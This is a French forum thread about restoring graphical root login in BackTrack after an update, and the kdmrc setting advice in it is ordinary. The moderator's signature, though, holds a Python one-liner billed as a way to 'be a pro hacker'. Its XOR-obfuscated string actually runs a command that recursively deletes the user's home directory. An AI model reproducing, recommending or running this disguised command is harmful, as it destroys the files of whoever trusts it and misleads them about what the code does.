Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 25-10-2012 20:03:33

bchdaves
Membre Actif

Root logins are not allowed

Bonjour à tous,

J'ai installé BkT5R1 sur une machine virtuel via VMware sans trop de problème.

J'ai lancé une maj par apt-get update && apt-get upgrade qui a priori c'est bien déroulée sauf que .. hmm

..Quand je relance la machine virtuelle je tombe sur une page que je n'avais jamais vu sur le BkT5R3 et je n'arrive plus à me connecter en root :

1165857361.png

Quelqu'un saurait d'où vient le problème ?

Dernière modification par bchdaves (25-10-2012 20:04:47)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 25-10-2012 21:49:23

antares145
Membre d'honneur
Site Web

Re : Root logins are not allowed

Salut !

- Ouvre une session terminal, donc ne tape pas startx à la première console, ou bien appuye sur CTRL-ALT-F2 pour récupérer une console. Assure-toi d'ouvrir une session "root", en TTY ça devrait passer.
- Tape la commande suivante :

nano /etc/kde4/kdm/kdmrc

- Dans ce fichier, tape CTRL+W pour passer en mode recherche et cherche "AllowRootLogin", normalement il est réglé sur "false"
- Tape "true" à la place de "false"
- Sauvegarde et quitte en appuyant sur CTRL+O puis CTRL+X
- Reviens à ta session graphique et essaie d'ouvrir une session Root. Si ça ne fonctionne pas, tu devras peut-être redémarrer.

Ca me surprend qu'une mise-à-jour de BackTrack aie repris les réglages KDM de Kubuntu, mais bon... venant d'une Ubuntu-like, plus rien ne devrait m'étonner...

Note que le conseil est bon : on ne devrait jamais ouvrir de session "Root" en mode graphique. Mais c'est vrai que c'est un peu contraignant quand on a pas l'habitude wink

[EDIT] Je pense que la section "BackTrack et distributions de sécurité" serait plus adaptée pour ce topic.
[EDIT]² Merci Spawn !

Dernière modification par antares145 (26-10-2012 09:07:48)

#3 26-10-2012 08:50:02

spawn
Modérateur

Re : Root logins are not allowed

Discussion déplacée !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce